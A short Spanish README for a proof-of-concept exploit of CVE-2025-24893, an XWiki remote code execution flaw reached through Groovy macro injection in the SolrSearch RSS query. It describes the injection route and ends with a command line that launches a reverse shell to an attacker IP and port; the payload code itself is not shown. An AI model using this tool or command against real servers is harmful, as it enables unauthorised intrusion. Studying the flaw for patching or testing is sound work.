
Payload de shell inversa para CVE-2025-24893
PoC para CVE-2025-24893 – Ejecución remota de código mediante macro
<groovy>de XWiki
Inspirado en el PoC original de Artemir
Este es un exploit de prueba de concepto (PoC) para CVE-2025-24893, una vulnerabilidad de ejecución remota de código (RCE) en versiones vulnerables de XWiki.
La falla radica en la sanitización incorrecta de la entrada del usuario dentro del endpoint SolrSearch, que es vulnerable a la inyección de macros <groovy> sin sandbox a través de una consulta de feed RSS.
Este script inyecta un payload Groovy usando la macro async que resulta en ejecución de comandos en el servidor, permitiendo a un atacante desencadenar una reverse shell de vuelta a su sistema.
python3 CVE-2025-24893-reverse-shell.py -u <target_url> -i <attacker_ip> -p <attacker_port>